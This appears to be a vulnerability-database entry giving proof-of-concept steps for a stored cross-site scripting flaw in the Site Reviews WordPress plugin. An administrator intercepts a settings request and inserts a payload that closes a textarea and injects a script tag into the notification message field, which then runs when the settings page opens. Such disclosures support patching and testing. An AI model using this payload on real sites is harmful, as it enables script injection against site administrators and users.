Share
## https://sploitus.com/exploit?id=WPEX-ID:4AE6BF90-B100-4BB5-BDD7-8ACDBD950596
1. Login as Admin.
2. Go to http://vulnerable-site.tld/wp-admin/edit.php?post_type=site-review&page=glsr-settings&tab=general
3. Make some changes in the `schema` tab and intercept the request.
4. The form will have the parameter `site_reviews_v6[settings][general][notification_message]`
5. Insert the following payload in it
```
<strong>A new {review_rating}-star review has been submitted:</strong>
</textarea><script>alert(1)</script>
{review_title}

{review_content}

{review_author} <{review_email}> - {review_ip}

{review_link}
```
6. Hit send and the xss payload will be saved and will be triggered whenever the settings page is open.